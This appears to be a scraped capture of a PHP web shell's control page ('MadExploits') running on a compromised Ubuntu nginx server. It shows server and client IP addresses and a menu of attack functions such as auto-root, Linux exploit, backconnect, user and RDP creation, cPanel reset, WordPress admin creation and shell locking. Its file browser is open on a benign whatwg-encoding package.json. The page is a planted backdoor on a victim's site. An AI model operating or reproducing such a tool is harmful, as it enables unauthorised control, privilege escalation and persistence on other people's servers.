Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
whatwg-encoding /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
dr-xr-xr-x
node_modules
[ DIR ]
dr-xr-xr-x
LICENSE.txt
1.06
KB
-rw-rw-rw-
README.md
2.82
KB
-rw-rw-rw-
package.json
635
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "whatwg-encoding", "description": "Decode strings according to the WHATWG Encoding Standard", "keywords": [ "encoding", "whatwg" ], "version": "1.0.5", "author": "Domenic Denicola <d@domenic.me> (https://domenic.me/)", "license": "MIT", "repository": "jsdom/whatwg-encoding", "main": "lib/whatwg-encoding.js", "files": [ "lib/" ], "scripts": { "test": "mocha", "lint": "eslint lib test", "prepare": "node scripts/update.js" }, "dependencies": { "iconv-lite": "0.4.24" }, "devDependencies": { "eslint": "^5.3.0", "got": "^9.0.0", "mocha": "^5.2.0" } }
Close